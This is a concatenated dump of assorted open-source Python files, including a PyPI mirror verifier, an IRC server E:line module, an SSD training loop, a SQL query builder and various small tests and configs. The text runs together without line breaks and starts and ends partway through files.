s: s.decode('utf8'), GARBAGE) def test_backslashreplace_error_strategy_works_when_decoding(): actual = GARBAGE.decode('utf8', 'backslashreplace') assert actual == r"a\xef\xf9" def test_backslashreplace_error_strategy_works_when_encoding(): actual = 'comet: \u2604'.encode('ascii', 'backslashreplace') assert actual == br"comet: \u2604" #-*-coding:utf8;-*- #qpy:console m = float(input('Digite o valor da medida: ')) cm = m * 100 mm = m * 1000 print('\n') print(' Metro: {} \n Centímetro: {} \n Milímetro: {}'.format(m, cm, mm)) dummy_device/blacs_workers.py """This is where BLACS really connects to the hardware. Everything elso is just sending it here. """ from blacs.tab_base_classes import Worker class DummyDeviceWorker(Worker): """The class behind the Output Worker. It inherits from Worker. Attributes: connection: Not sure here. shot_file: Not sure here. """ shot_file = None timeout = 10 def init(self): """Initialize the Worker. Initializes the IP socket and resets everything properly. Do NOT rename it to __init__ . There is something specific about Blacs that remains a bit mystical to me. """ # Each shot, we will remember the shot file for the duration of that shot self.timeout = 10 self.shot_file = None def __repr__(self): """Nice printing format for the YunTempWorker. Returns: ret_str: a string that is some key information about the worker. """ ret_str = "" return ret_str def transition_to_buffered(self, device_name, h5_file, initial_values, fresh): """ Required - Read commands from the shot file and send them to the device. Not sure about the right description here. Args: device_name: Not sure here. h5_file: Not sure here. initial_values: Not sure here. fresh: Not sure here. Returns: Empty dict. """ # pylint: disable=unused-argument, R0201 # # This is expected by BLACS, we should return the final values that numerical # channels have from th shot - for us we have no channels so this is an empty # dictionary return {} def transition_to_manual(self): """ Required - Not sure what it does. Not sure about the right description here. Returns: Empty dict. """ # pylint: disable= R0201 # This is expected by BLACS to indicate success: return True def abort_buffered(self): """ Called when BLACS closes. Called when a shot is aborted. We may or may not want to run transition_to_manual in this case. If not, then this method should do whatever else it needs to, and then return True. It should make sure to clear any state were storing about this shot (e.g. it should set self.shot_file = None) """ return self.transition_to_manual() def abort_transition_to_buffered(self): """ This is called if transition_to_buffered fails with an exception or returns False. Returns: True, which indicates success. """ # Forget the shot file: self.shot_file = None return True # Indicates success def program_manual(self, front_panel_values): """Performans manual updates from BLACS front panel. Attributes: front_panel_values: Not where they come from. Returns: dict: Which are the values the Arduino gives us back after we programmed it. """ # pylint: disable= R0201, W0613 # Update values from front panel return {} setup.py1-10 #!/usr/bin/env python from setuptools import setup, find_packages setup( name = "Main Array Generator", description='printf without printf, but with main... as an array!', version = "0.1", author='', author_email='', packages = find_packages(), install_requires = ['pexpect>=0.1'], scripts=['gen.py'] )src/bandersnatch/verify.py import argparse import asyncio import concurrent.futures import json import logging import os import shutil from argparse import Namespace from asyncio.queues import Queue from configparser import ConfigParser from pathlib import Path from sys import stderr from typing import List, Optional, Set from urllib.parse import urlparse from .filter import LoadedFilters from .master import Master from .storage import storage_backend_plugins from .utils import convert_url_to_path, hash, recursive_find_files, unlink_parent_dir logger = logging.getLogger(__name__) async def get_latest_json( master: Master, json_path: Path, config: ConfigParser, executor: Optional[concurrent.futures.ThreadPoolExecutor] = None, delete_removed_packages: bool = False, ) -> None: url_parts = urlparse(config.get("mirror", "master")) url = f"{url_parts.scheme}://{url_parts.netloc}/pypi/{json_path.name}/json" logger.debug(f"Updating {json_path.name} json from {url}") new_json_path = json_path.parent / f"{json_path.name}.new" await master.url_fetch(url, new_json_path, executor) if new_json_path.exists(): shutil.move(str(new_json_path), json_path) else: logger.error( f"{str(new_json_path)} does not exist - Did not get new JSON metadata" ) if delete_removed_packages and json_path.exists(): logger.debug(f"Unlinking {json_path} - assuming it does not exist upstream") json_path.unlink() async def delete_unowned_files( mirror_base: Path, executor: concurrent.futures.ThreadPoolExecutor, all_package_files: List[Path], dry_run: bool, ) -> int: loop = asyncio.get_event_loop() packages_path = mirror_base / "web" / "packages" all_fs_files: Set[Path] = set() await loop.run_in_executor( executor, recursive_find_files, all_fs_files, packages_path ) all_package_files_set = set(all_package_files) unowned_files = all_fs_files - all_package_files_set logger.info( f"We have {len(all_package_files_set)} files. " + f"{len(unowned_files)} unowned files" ) if not unowned_files: logger.info(f"{mirror_base} has no files to delete") return 0 if dry_run: print("[DRY RUN] Unowned file list:", file=stderr) for f in sorted(unowned_files): print(f) else: del_coros = [] for file_path in unowned_files: del_coros.append( loop.run_in_executor(executor, unlink_parent_dir, file_path) ) await asyncio.gather(*del_coros) return 0 async def verify( master: Master, config: ConfigParser, json_file: str, mirror_base_path: Path, all_package_files: List[Path], args: argparse.Namespace, executor: Optional[concurrent.futures.ThreadPoolExecutor] = None, releases_key: str = "releases", ) -> None: json_base = mirror_base_path / "web" / "json" json_full_path = json_base / json_file loop = asyncio.get_event_loop() logger.info(f"Parsing {json_file}") if args.json_update: if not args.dry_run: await get_latest_json(master, json_full_path, config, executor, args.delete) else: logger.info(f"[DRY RUN] Would of grabbed latest json for {json_file}") if not json_full_path.exists(): logger.debug(f"Not trying to sync package as {json_full_path} does not exist") return try: with json_full_path.open("r") as jfp: pkg = json.load(jfp) except json.decoder.JSONDecodeError as jde: logger.error(f"Failed to load {json_full_path}: {jde} - skipping ...") return # apply releases filter plugins like class Package for plugin in LoadedFilters().filter_release_plugins() or []: plugin.filter(pkg["info"]) for release_version in pkg[releases_key]: for jpkg in pkg[releases_key][release_version]: pkg_file = mirror_base_path / "web" / convert_url_to_path(jpkg["url"]) if not pkg_file.exists(): if args.dry_run: logger.info(f"{jpkg['url']} would be fetched") all_package_files.append(pkg_file) continue else: await master.url_fetch(jpkg["url"], pkg_file, executor) calc_sha256 = await loop.run_in_executor(executor, hash, str(pkg_file)) if calc_sha256 != jpkg["digests"]["sha256"]: if not args.dry_run: await loop.run_in_executor(None, pkg_file.unlink) await master.url_fetch(jpkg["url"], pkg_file, executor) else: logger.info( f"[DRY RUN] {jpkg['info']['name']} has a sha256 mismatch." ) all_package_files.append(pkg_file) logger.info(f"Finished validating {json_file}") async def verify_producer( master: Master, config: ConfigParser, all_package_files: List[Path], mirror_base_path: Path, json_files: List[str], args: argparse.Namespace, executor: Optional[concurrent.futures.ThreadPoolExecutor] = None, ) -> None: queue: asyncio.Queue = asyncio.Queue() for jf in json_files: await queue.put(jf) async def consume(q: Queue) -> None: while not q.empty(): json_file = await q.get() await verify( master, config, json_file, mirror_base_path, all_package_files, args, executor, ) await asyncio.gather( *[consume(queue)] * config.getint("mirror", "verifiers", fallback=3) ) async def metadata_verify(config: ConfigParser, args: Namespace) -> int: """Crawl all saved JSON metadata or online to check we have all packages if delete - generate a diff of unowned files""" all_package_files: List[Path] = [] loop = asyncio.get_event_loop() storage_backend = next( iter(storage_backend_plugins(config=config, clear_cache=True)) ) mirror_base_path = storage_backend.PATH_BACKEND(config.get("mirror", "directory")) json_base = mirror_base_path / "web" / "json" workers = args.workers or config.getint("mirror", "workers") executor = concurrent.futures.ThreadPoolExecutor(max_workers=workers) logger.info(f"Starting verify for {mirror_base_path} with {workers} workers") try: json_files = await loop.run_in_executor(executor, os.listdir, json_base) except FileExistsError as fee: logger.error(f"Metadata base dir {json_base} does not exist: {fee}") return 2 if not json_files: logger.error("No JSON metadata files found. Can not verify") return 3 logger.debug(f"Found {len(json_files)} objects in {json_base}") logger.debug(f"Using a {workers} thread ThreadPoolExecutor") async with Master( config.get("mirror", "master"), config.getfloat("mirror", "timeout"), config.getfloat("mirror", "global-timeout", fallback=None), ) as master: await verify_producer( master, config, all_package_files, mirror_base_path, json_files, args, executor, ) if not args.delete: return 0 return await delete_unowned_files( mirror_base_path, executor, all_package_files, args.dry_run ) from .pydatastream import Datastream, DatastreamException from ._version import * from sqlpuzzle._common import Object from sqlpuzzle._queries.options import Options __all__ = () class SelectOptions(Options): _definition_of_options = { 'sql_cache': { 'off': '', 'cache': 'SQL_CACHE', 'no_cache': 'SQL_NO_CACHE' }, 'duplicated': { 'off': '', 'all': 'ALL', 'distinct': 'DISTINCT', 'distinctrow': 'DISTINCTROW', }, 'sql_small_result': { 'off': '', 'on': 'SQL_SMALL_RESULT', }, 'sql_big_result': { 'off': '', 'on': 'SQL_BIG_RESULT', }, 'sql_buffer_result': { 'off': '', 'on': 'SQL_BUFFER_RESULT', }, 'sql_calc_found_rows': { 'off': '', 'on': 'SQL_CALC_FOUND_ROWS', }, 'straight_join': { 'off': '', 'on': 'STRAIGHT_JOIN', }, 'high_priority': { 'off': '', 'on': 'HIGH_PRIORITY', }, } def sql_cache(self, allow=True): self._options['sql_cache'] = 'cache' if allow else 'off' def sql_no_cache(self, allow=True): self._options['sql_cache'] = 'no_cache' if allow else 'off' def all(self, allow=True): self._options['duplicated'] = 'all' if allow else 'off' def distinct(self, allow=True): self._options['duplicated'] = 'distinct' if allow else 'off' def distinctrow(self, allow=True): self._options['duplicated'] = 'distinctrow' if allow else 'off' def sql_small_result(self, allow=True): self._options['sql_small_result'] = 'on' if allow else 'off' def sql_big_result(self, allow=True): self._options['sql_big_result'] = 'on' if allow else 'off' def sql_buffer_result(self, allow=True): self._options['sql_buffer_result'] = 'on' if allow else 'off' def sql_calc_found_rows(self, allow=True): self._options['sql_calc_found_rows'] = 'on' if allow else 'off' def straight_join(self, allow=True): self._options['straight_join'] = 'on' if allow else 'off' def high_priority(self, allow=True): self._options['high_priority'] = 'on' if allow else 'off' class SelectForUpdate(Object): def __init__(self): super().__init__() self._for_update = False def __str__(self): if self._for_update: return 'FOR UPDATE' return '' def __eq__(self, other): return ( type(self) == type(other) and self._for_update == other._for_update ) @property def is_set(self): return self._for_update def has(self, value): return hasattr(self, value) def for_update(self, allow=True): self._for_update = bool(allow) stacksites/extensions.py # -*- coding: utf-8 -*- from flask.ext.sqlalchemy import SQLAlchemy db = SQLAlchemy() from flask.ext.bcrypt import Bcrypt bcrypt = Bcrypt() from flask.ext.login import LoginManager login_manager = LoginManager() from flask.ext.migrate import Migrate migrate = Migrate() from flask.ext.mail import Mail mail = Mail() from flask_sslify import SSLify from flask_wtf.csrf import CsrfProtect csrf = CsrfProtect() # Flask settings DEBUG = False # Flask-restplus settings RESTPLUS_MASK_SWAGGER = False # Application settings # API metadata API_TITLE = 'MAX Human Pose Estimator' API_DESC = 'Detect humans in an image and estimate the pose for each person.' API_VERSION = '1.1.0' # default model MODEL_NAME = 'MAX Human Pose Estimator' DEFAULT_MODEL_PATH = 'assets/human-pose-estimator-tensorflow.pb' MODEL_LICENSE = 'Apache License 2.0' DEFAULT_IMAGE_SIZE_STR = '432x368' DEFAULT_IMAGE_SIZE = (432,368) # Recommends: 432x368 or 656x368 or 1312x736 DEFAULT_BATCH_SIZE = 2 DEFAULT_PREPROCESS_THREADS = 2 includoo/graph/video_together.py import requests def create_room(video_url=r"https://www.youtube.com/watch?v=3ZRE6uVMDAo"): request_url = r"https://w2g.tv/rooms/create.json" api_key = "" r = requests.post(request_url, data={"w2g_api_key": api_key, "share": video_url}) if r.ok: room_key = r.json()["streamkey"] response_url = f"https://w2g.tv/rooms/{room_key}" else: response_url = "https://w2g.tv/rooms/" return response_url #print(create_room()) almartin82/bayeslitesrc/backends/cgpm_analyze/parse.py # -*- coding: utf-8 -*- # Copyright (c) 2010-2016, MIT Probabilistic Computing Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import namedtuple from bayeslite.exception import BQLParseError from bayeslite.util import casefold import grammar ''' grep -o 'K_[A-Z][A-Z0-9_]*' < grammar.y | sort -u | awk ' { sub("^K_", "", $1); printf(" '\''%s'\'': grammar.K_%s,\n", tolower($1), $1); }' ''' KEYWORDS = { 'clustering': grammar.K_CLUSTERING, 'concentration': grammar.K_CONCENTRATION, 'hyperparameters': grammar.K_HYPERPARAMETERS, 'loom': grammar.K_LOOM, 'optimized': grammar.K_OPTIMIZED, 'quiet': grammar.K_QUIET, 'row': grammar.K_ROW, 'rows': grammar.K_ROWS, 'skip': grammar.K_SKIP, 'subproblem': grammar.K_SUBPROBLEM, 'subproblems': grammar.K_SUBPROBLEMS, 'variable': grammar.K_VARIABLE, 'variables': grammar.K_VARIABLES, } PUNCTUATION = { ',': grammar.T_COMMA, '(': grammar.T_LROUND, ')': grammar.T_RROUND, ';': grammar.T_SEMI, } def parse(tokens): semantics = CGpmAnalyzeSemantics() parser = grammar.Parser(semantics) for token in tokenize(tokens): semantics.context.append(token) if len(semantics.context) > 10: semantics.context.pop(0) parser.feed(token) if semantics.errors: raise BQLParseError(semantics.errors) if semantics.failed: raise BQLParseError(['parse failed mysteriously']) assert semantics.phrases is not None return semantics.phrases def tokenize(tokens): for token in tokens: if isinstance(token, str): if casefold(token) in KEYWORDS: yield KEYWORDS[casefold(token)], token elif token in PUNCTUATION: yield PUNCTUATION[token], token else: # XXX check for alphanumeric/_ yield grammar.L_NAME, token elif isinstance(token, (int, float)): yield grammar.L_NUMBER, token else: raise IOError('Invalid token: %r' % (token,)) yield 0, '' # EOF class CGpmAnalyzeSemantics(object): def __init__(self): self.context = [] self.errors = [] self.failed = False self.phrases = None def accept(self): pass def parse_failed(self): self.failed = True def syntax_error(self, (token, text)): if token == -1: # error self.errors.append('Bad token: %r' % (text,)) else: self.errors.append("Syntax error near [%s] after [%s]" % ( text, ' '.join([str(t) for (_t, t) in self.context[:-1]]))) def p_analysis_start(self, ps): self.phrases = ps def p_phrases_one(self, p): return [p] if p else [] def p_phrases_many(self, ps, p): if p: ps.append(p) return ps def p_phrase_none(self,): return None def p_phrase_variables(self, cols): return Variables(cols) def p_phrase_skip(self, cols): return Skip(cols) def p_phrase_rows(self, rows): return Rows(rows) def p_phrase_loom(self): return Optimized('loom') def p_phrase_optimized(self): return Optimized('lovecat') def p_phrase_quiet(self): return Quiet(True) def p_phrase_subproblems(self, s): return Subproblem(s) def p_subproblems_list_one(self, s): return [s] def p_subproblems_list_many(self, s): return s def p_subproblems_one(self, s): return [s] def p_subproblems_many(self, ss, s): ss.append(s); return ss def p_subproblem_variable_hyperparameters(self): return 'variable_hyperparameters' def p_subproblem_variable_clustering(self): return 'variable_clustering' def p_subproblem_variable_clustering_concentration(self): return 'variable_clustering_concentration' def p_subproblem_row_clustering(self): return 'row_clustering' def p_subproblem_row_clustering_concentration(self): return 'row_clustering_concentration' def p_column_list_one(self, col): return [col] def p_column_list_many(self, cols, col): cols.append(col); return cols def p_column_name_n(self, name): return name def p_row_list_one(self, row): return [row] def p_row_list_many(self, rows, row): rows.append(row); return rows def p_row_index_n(self, n): return n Optimized = namedtuple('Optimized', ['backend']) Quiet = namedtuple('Quiet', ['flag']) Rows = namedtuple('Rows', ['rows']) Skip = namedtuple('Skip', ['vars']) Subproblem = namedtuple('Subproblem', ['subproblems']) Variables = namedtuple('Variables', ['vars']) whr0724/SSD-Pytorch # -*- coding: utf-8 -*- # @Author : LG import torch from torch.optim.lr_scheduler import MultiStepLR from Data import Our_Dataloader from .structs import multiboxloss from Utils.visdom_op import visdom_line, setup_visdom, visdom_bar from torch import nn from torch.nn import DataParallel import os __all__ = ['Trainer'] class Trainer(object): """ 模型训练器,不指定参数时,均默认使用Configs中配置的参数 *** 推荐使用Configs文件管理参数, 不推荐在函数中进行参数指定, 只是为了扩展 *** *** 默认使用 SGD 优化器, 如需使用其他优化器, 继承该类,对build_optimizer方法进行重写即可*** 模型在训练时,会使用DataParallel进行包装,以便于在多GPU上进行训练 本训练器只支持GPU训练,单机单卡与单机单卡均可,但不支持cpu,不支持多机多卡(别问为啥不支持多机多卡.穷!!!) eg: trainer = Trainer(cfg) # 实例化训练器 trainer(net,train_dataset) # 在train_dataset数据集上训练模型net """ def __init__(self, cfg, max_iter=None, batch_size=None, train_devices=None, model_save_step=None, model_save_root=None, vis = None, vis_step=None): """ 训练器初始化 值为None的参数项不指定时为默认,已在配置文件中设置. 如需更改参数建议在Configs配置文件中进行更改 不建议直接指定参数,只留做扩展用. :param cfg: 配置 :param max_iter: 最大训练轮数 :param batch_size: 批次数, :param train_devices: 训练设备,列表,eg:[0,1],使用0,1俩个GPU,这里0,1为gpu编号,可用nvidia-smi查看.,不指定时为默认,已在配置文件中设置 :param vis: visdom.Visdom(),用于训练过程可视化.绘制损失曲线已经学习率 :param model_save_step: 模型保存步长 :param vis_step: visdom可视化步长 """ self.cfg = cfg self.iterations = self.cfg.TRAIN.MAX_ITER if max_iter: self.iterations = max_iter self.batch_size = cfg.TRAIN.BATCH_SIZE if batch_size: self.batch_size = batch_size self.train_devices = cfg.DEVICE.TRAIN_DEVICES if train_devices: self.train_devices = train_devices self.model_save_root = cfg.FILE.MODEL_SAVE_ROOT if model_save_root: self.model_save_root = model_save_root if not os.path.exists(self.model_save_root): os.mkdir(self.model_save_root) self.model_save_step = self.cfg.STEP.MODEL_SAVE_STEP if model_save_step: self.model_save_step = model_save_step self.vis = setup_visdom() if vis: self.vis = vis self.vis_step = self.cfg.STEP.VIS_STEP if vis_step: self.vis_step = vis_step self.model = None self.loss_func = None self.optimizer = None self.scheduler = None def __call__(self, model, dataset): """ 训练器使用, 传入 模型 与数据集. :param model: :param dataset: :return: """ if not isinstance(model, nn.DataParallel): # raise TypeError('请用 DataParallel 包装模型. eg: model = DataParallel(model, device_ids=[0,1,2]),使用device_ids指定需要使用的gpu') model = DataParallel(model, device_ids=self.train_devices) self.model = model data_loader = Our_Dataloader(dataset, batch_size=self.batch_size, shuffle=True) print(' Max_iter = {}, Batch_size = {}'.format(self.iterations, self.batch_size)) print(' Model will train on cuda:{}'.format(self.train_devices)) num_gpu_use = len(self.train_devices) if (self.batch_size % num_gpu_use) != 0: raise ValueError( 'You use {} gpu to train , but set batch_size={}'.format(num_gpu_use, data_loader.batch_size)) self.set_lossfunc() self.set_optimizer() self.set_scheduler() print("Set optimizer : {}".format(self.optimizer)) print("Set scheduler : {}".format(self.scheduler)) print("Set lossfunc : {}".format(self.loss_func)) print(' Start Train......') print(' -------' * 20) for iteration, (images, boxes, labels, image_names) in enumerate(data_loader): iteration+=1 boxes, labels = boxes.to('cuda'), labels.to('cuda') cls_logits, bbox_preds = self.model(images) reg_loss, cls_loss = self.loss_func(cls_logits, bbox_preds, labels, boxes) reg_loss = reg_loss.mean() cls_loss = cls_loss.mean() loss = reg_loss + cls_loss self.optimizer.zero_grad() loss.backward() self.optimizer.step() self.scheduler.step() lr = self.optimizer.param_groups[0]['lr'] if iteration % 10 == 0: print('Iter : {}/{} | Lr : {} | Loss : {:.4f} | cls_loss : {:.4f} | reg_loss : {:.4f}'.format(iteration, self.iterations, lr, loss.item(), cls_loss.item(), reg_loss.item())) if self.vis and iteration % self.vis_step == 0: visdom_line(self.vis, y=[loss], x=iteration, win_name='loss') visdom_line(self.vis, y=[reg_loss], x=iteration, win_name='reg_loss') visdom_line(self.vis, y=[cls_loss], x=iteration, win_name='cls_loss') visdom_line(self.vis, y=[lr], x=iteration, win_name='lr') if iteration % self.model_save_step == 0: torch.save(model.module.state_dict(), '{}/model_{}.pkl'.format(self.model_save_root, iteration)) return True def set_optimizer(self, lr=None, momentum=None, weight_decay=None): """ 配置优化器 :param lr: 初始学习率, 默认0.001 :param momentum: 动量, 默认 0.9 :param weight_decay: 权重衰减,L2, 默认 5e-4 :return: """ if not lr: lr= self.cfg.OPTIM.LR if not momentum: momentum = self.cfg.OPTIM.MOMENTUM if not weight_decay: weight_decay = self.cfg.OPTIM.WEIGHT_DECAY self.optimizer = torch.optim.SGD(self.model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay) def set_lossfunc(self, neg_pos_ratio=None): """ 配置损失函数 :param neg_pos_ratio: 负正例 比例,默认3, 负例数量是正例的三倍 :return: """ if not neg_pos_ratio: neg_pos_ratio = self.cfg.TRAIN.NEG_POS_RATIO self.loss_func = multiboxloss(neg_pos_ratio=neg_pos_ratio) # print(' Trainer set loss_func : {}, neg_pos_ratio = {}'.format('multiboxloss', neg_pos_ratio)) def set_scheduler(self, lr_steps=None, gamma=None): """ 配置学习率衰减策略 :param lr_steps: 默认 [80000, 10000],当训练到这些轮次时,学习率*gamma :param gamma: 默认 0.1,学习率下降10倍 :return: """ if not lr_steps: lr_steps = self.cfg.OPTIM.SCHEDULER.LR_STEPS if not gamma: gamma = self.cfg.OPTIM.SCHEDULER.GAMMA self.scheduler = MultiStepLR(optimizer=self.optimizer, milestones=lr_steps, gamma=gamma) # print(' Trainer set scheduler : {}, lr_steps={}, gamma={}'.format('MultiStepLR', lr_steps, gamma)) tests/test_components.py """ProtoTorch components test suite.""" import prototorch as pt import torch def test_labcomps_zeros_init(): protos = torch.zeros(3, 2) c = pt.components.LabeledComponents( distribution=[1, 1, 1], initializer=pt.components.Zeros(2), ) assert (c.components == protos).any() == True def test_labcomps_warmstart(): protos = torch.randn(3, 2) plabels = torch.tensor([1, 2, 3]) c = pt.components.LabeledComponents( distribution=[1, 1, 1], initializer=None, initialized_components=[protos, plabels], ) assert (c.components == protos).any() == True assert (c.component_labels == plabels).any() == True import logging from gongish.router import RouterMixin from gongish.configuration import ConfigurationMixin logger = logging.getLogger("gongish") class Application(RouterMixin, ConfigurationMixin): #: Application logger based on python builtin logging module __logger__ = logger def __init__(self): ConfigurationMixin.__init__(self) RouterMixin.__init__(self) def setup(self): # pragma: nocover raise NotImplementedError def shutdown(self): # pragma: nocover raise NotImplementedError lib_apk_shrink/model/UselessLayoutConfig.py #! /usr/bin/env python # -*- coding: utf-8 -*- # class UselessLayoutConfig(object): src_dir = [] layout_dir = [] xml_dir = [] white_list = [] def __init__(self, dict=[]): if 'src_dir' in dict: self.src_dir = dict['src_dir'] if 'layout_dir' in dict: self.layout_dir = dict['layout_dir'] if 'xml_dir' in dict: self.xml_dir = dict['xml_dir'] if 'white_list' in dict: self.white_list = dict['white_list'] def __repr__(self): return 'UselessLayoutConfig' bioexcel/biobb_analysis1-10 from biobb_common.tools import test_fixtures as fx from biobb_analysis.ambertools.cpptraj_mask import cpptraj_mask class TestCpptrajMask(): def setUp(self): fx.test_setup(self,'cpptraj_mask') def tearDown(self): fx.test_teardown(self) pass def test_mask(self): cpptraj_mask(properties=self.properties, **self.paths) assert fx.not_empty(self.paths['output_cpptraj_path']) assert fx.equal(self.paths['output_cpptraj_path'], self.paths['ref_output_cpptraj_path']) import os import json from C2char import getListdir from aip import AipNlp def App(): APP_ID = '11169559' API_KEY = '' SECRET_KEY = '' return AipNlp(APP_ID, API_KEY, SECRET_KEY) def getText(txt): f=open(txt,'r',encoding='UTF-8') return f.read().encode('GBK','ignore').decode('GBK') def getStopwords(txt): stopwords=[] with open(txt,'r',encoding='UTF-8') as f: for word in f.read().splitlines(): stopwords.append(word) return stopwords def writeJSON(text, i): with open('../News_ws_C/News_'+str(i)+'.json', 'w',encoding='UTF-8') as f: json.dump(text,f,ensure_ascii=False) def delStopword(items,stopwords): newitems=[] for item in items: if item['item'] in stopwords: continue newitems.append(item) return newitems def main(): stopwords=getStopwords('./stop_words_zh.txt') d='./News_C/' os.chdir(d) fa=getListdir(os) client = App() e=[] for i in range(0,len(fa)): text = str(getText(fa[i])) r=client.lexer(text) if 'error_code' in r.keys(): e.append(fa[i]) continue print(fa[i]) items={'items':delStopword(r['items'],stopwords)} writeJSON(items,i+1) print('error: ',end=' ') print(e) if __name__=='__main__': main() swelanauguste/crown_land_1 from django.urls import path from . import views app_name = "employees" urlpatterns = [ path( "update/", views.EmployeeUpdateView.as_view(), name="employee-update" ), path( "detail/", views.EmployeeDetailView.as_view(), name="employee-detail" ), ] import os import configparser PATH_TO_CONFIG_FILE = os.path.join(os.path.dirname(__file__), "../../configs/autodp.cfg") # Check if file exists and readable if not (os.path.isfile(PATH_TO_CONFIG_FILE) and os.access(PATH_TO_CONFIG_FILE, os.R_OK)): raise IOError("Either file %s is missing or not readable" % PATH_TO_CONFIG_FILE) # Create a configuration parser to parse all necessary parameters config_parser = configparser.RawConfigParser() config_parser.read(PATH_TO_CONFIG_FILE) from kombu import Connection, Exchange, Producer, Queue, Consumer conn = Connection("amqp://guest:guest@localhost:5672") exchange = Exchange("rpc", type="direct") request_queue = Queue(name="rpc", exchange=exchange, routing_key="request") request_queue.maybe_bind(conn) request_queue.declare() def process_message(body,message): print("Request: %s" %body) message.ack() #send reply to client producer = Producer(channel=conn, routing_key=message.properties['reply_to']) producer.publish("result") with Consumer(conn, request_queue, callbacks=[process_message]): conn.drain_events() def read_multipletlist(filename): multipletlist=[] with open(filename, 'r') as linefile: newmultiplet={'name':'','wave':[],'linename':[]} for read in linefile: #cut off all comments on line read=read.split('#')[0] #strip whitespaces read=read.strip() #skip empty lines or comment lines if not(len(read) == 0): readsplit = read.split('&') if len(readsplit) == 1: if len(newmultiplet['wave']) > 0: multipletlist.append(newmultiplet) newmultiplet={'name':readsplit[0],'wave':[],'linename':[]} else: #add wavelength and linename to newmultiplet try: wave=float(readsplit[0]) if wave <= 0: raise ValueError newmultiplet['wave'].append(wave) newmultiplet['linename'].append(readsplit[1].strip()) except ValueError: print readsplit[0]+' is not a valid number in line '+read else: #at end of file (i.e. end of for loop) add last multiplet (if not empty) if len(newmultiplet['wave']) > 0: multipletlist.append(newmultiplet) return multipletlist txircd/modules/core/bans_eline.py from twisted.plugin import IPlugin from twisted.words.protocols import irc from txircd.module_interface import Command, ICommand, IModuleData, ModuleData from txircd.modules.xlinebase import XLineBase from txircd.utils import durationToSeconds, ircLower, now from zope.interface import implements from fnmatch import fnmatchcase class ELine(ModuleData, XLineBase): implements(IPlugin, IModuleData) name = "ELine" core = True lineType = "E" def actions(self): return [ ("verifyxlinematch", 10, self.checkException), ("commandpermission-ELINE", 10, self.restrictToOper), ("statsruntype-elines", 10, self.generateInfo), ("burst", 10, self.burstLines) ] def userCommands(self): return [ ("ELINE", 1, UserELine(self)) ] def serverCommands(self): return [ ("ADDLINE", 1, ServerAddELine(self)), ("DELLINE", 1, ServerDelELine(self)) ] def load(self): self.initializeLineStorage() def checkUserMatch(self, user, mask, data): exceptMask = ircLower(mask) userMask = ircLower("{}@{}".format(user.ident, user.host())) if fnmatchcase(userMask, exceptMask): return True userMask = ircLower("{}@{}".format(user.ident, user.realHost)) if fnmatchcase(userMask, exceptMask): return True userMask = ircLower("{}@{}".format(user.ident, user.ip)) if fnmatchcase(userMask, exceptMask): return True return False def checkException(self, lineType, user, mask, data): if lineType == "E": return None if self.matchUser(user) is not None and not self.ircd.runActionUntilFalse("xlinetypeallowsexempt", lineType): return False return None def restrictToOper(self, user, data): if not self.ircd.runActionUntilValue("userhasoperpermission", user, "command-eline", users=[user]): user.sendMessage(irc.ERR_NOPRIVILEGES, "Permission denied - You do not have the correct operator privileges") return False return None class UserELine(Command): implements(ICommand) def __init__(self, module): self.module = module def parseParams(self, user, params, prefix, tags): if len(params) < 1 or len(params) == 2: user.sendSingleError("ELineParams", irc.ERR_NEEDMOREPARAMS, "ELINE", "Not enough parameters") return None banmask = params[0] if banmask in self.module.ircd.userNicks: targetUser = self.module.ircd.users[self.module.ircd.userNicks[banmask]] banmask = "{}@{}".format(targetUser.ident, targetUser.realHost) else: if "@" not in banmask: banmask = "*@{}".format(banmask) if len(params) == 1: return { "mask": banmask } return { "mask": banmask, "duration": durationToSeconds(params[1]), "reason": " ".join(params[2:]) } def execute(self, user, data): banmask = data["mask"] if "reason" in data: if not self.module.addLine(banmask, now(), data["duration"], user.hostmask(), data["reason"]): user.sendMessage("NOTICE", "*** E:Line for {} is already set.".format(banmask)) return True if data["duration"] > 0: user.sendMessage("NOTICE", "*** Timed e:line for {} has been set, to expire in {} seconds.".format(banmask, data["duration"])) else: user.sendMessage("NOTICE", "*** Permanent e:line for {} has been set.".format(banmask)) return True if not self.module.delLine(banmask): user.sendMessage("NOTICE", "*** E:Line for {} doesn't exist.".format(banmask)) return True user.sendMessage("NOTICE", "*** E:Line for {} has been removed.".format(banmask)) return True class ServerAddELine(Command): implements(ICommand) def __init__(self, module): self.module = module def parseParams(self, server, params, prefix, tags): return self.module.handleServerAddParams(server, params, prefix, tags) def execute(self, server, data): return self.module.executeServerAddCommand(server, data) class ServerDelELine(Command): implements(ICommand) def __init__(self, module): self.module = module def parseParams(self, server, params, prefix, tags): return self.module.handleServerDelParams(server, params, prefix, tags) def execute(self, server, data): return self.module.executeServerDelCommand(server, data) elineModule = ELine()kyleniemeyer/altamisa # -*- coding: utf-8 -*- """ Module for helper functions of global use. """ __author__ = " <>" def is_ontology_term_ref(v): """Duck typing check for objects of class `models.OntologyTermRef`""" return hasattr(v, "name") and hasattr(v, "ontology_name") and hasattr(v, "accession") cfgov/cfgov/tests/test_test.py1-10 from __future__ import print_function import six import sys from six import StringIO from unittest import TestCase, TestSuite, defaultTestLoader from cfgov.test import StdoutCapturingTestRunner, redirect_stdout if six.PY2: class TestRedirectStdout(TestCase): def test_redirect_to_string_io(self): stdout = sys.stdout unstdout = StringIO() with redirect_stdout(unstdout): self.assertIs(sys.stdout, unstdout) print('Hello, world!', file=sys.stdout) self.assertIs(sys.stdout, stdout) test_str = unstdout.getvalue().strip() self.assertEqual(test_str, 'Hello, world!') def test_raises_exception(self): unstdout = StringIO() with self.assertRaises(ValueError): with redirect_stdout(unstdout): raise ValueError('Test exception handling') class StderrSuppressingStdoutCapturingTestRunner(StdoutCapturingTestRunner): """Modified StdoutCapturingTestRunner for use in testing. Normally when tests are run, they write output to stderr indicating how many tests are run, and whether they succeed, like this: . ---------------------------------------------------------------------- Ran 1 test in 0.000s OK For the purposes of testing our test runner, we want to suppress this output, so that we don't get test case output within our test case output. We do this by capturing stderr while the tests are run. Note that this is independent of stdout output, which is what we are actually testing. """ def get_test_runner_kwargs(self): kwargs = super(StderrSuppressingStdoutCapturingTestRunner, self). \ 